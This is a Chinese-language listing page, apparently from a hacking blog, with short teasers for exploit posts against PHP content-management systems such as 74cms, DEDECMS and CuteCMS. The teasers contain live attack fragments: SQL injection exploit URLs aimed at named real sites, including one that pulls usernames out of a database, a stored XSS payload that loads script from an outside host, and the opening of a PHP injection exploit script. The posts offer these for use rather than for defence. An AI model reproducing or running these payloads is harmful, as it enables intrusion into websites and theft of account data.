74cms最新通杀注入漏洞 05月25日

一个iconv引发的猪肉 经过测试官网居然没补。。。 md5解不开,但是可以用来爆各种信息 你懂的 exp:http://demo.74cms.com/plus/ajax_common.php?act=hotword&que...

骑士人才(74CMS)3.X通杀XSS 03月21日

个XSS好像是从12年3.1开始就存在的吧,到现在的3.4还是没有修复。 漏洞页面:link/add_link.php 友情链接:LOGO处填写><script  src=http://xss地...

DEDECMS全版本无视GPC注入exp 02月28日

<?php print_r( " +------------------------------------+ DEDECMS全版本无视GPC注入 code by :Sunshie Usage: $argv[0] <domain> Example: ...

程氏舞曲CMS 三步GETSHELL 01月15日

  简要描述: SQL绕过双重保险再注射+无需解MD5后台认证绕过(同时绕过了安装时写在config文件里的验证码)+后台GETSHELL 无论从技术难度还是危害讨论,均已到达...

DEDECMS会员中心注入2 01月15日

  漏洞文件member/pm.php (官方已修补) 下载补丁下来看看member/pm.php文件到底修补了什么     对id加了个intval 看来id是有注入的j节奏了 关键在这...

DEDECMS最新注入一枚 01月14日

Author:Sunshie QQ:1141056911 Blog:https://phpinfo.me  F4ck Team & Ezenteam  ####################### 今天无聊逛乌云发现有人提交了个漏洞,不知道和我的...

CuteCMS 注入 01月07日

exp : http://www.tcyl.net/search.php?c=5&hit=1&s=%27and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20concat%28username%29%20fro...

loading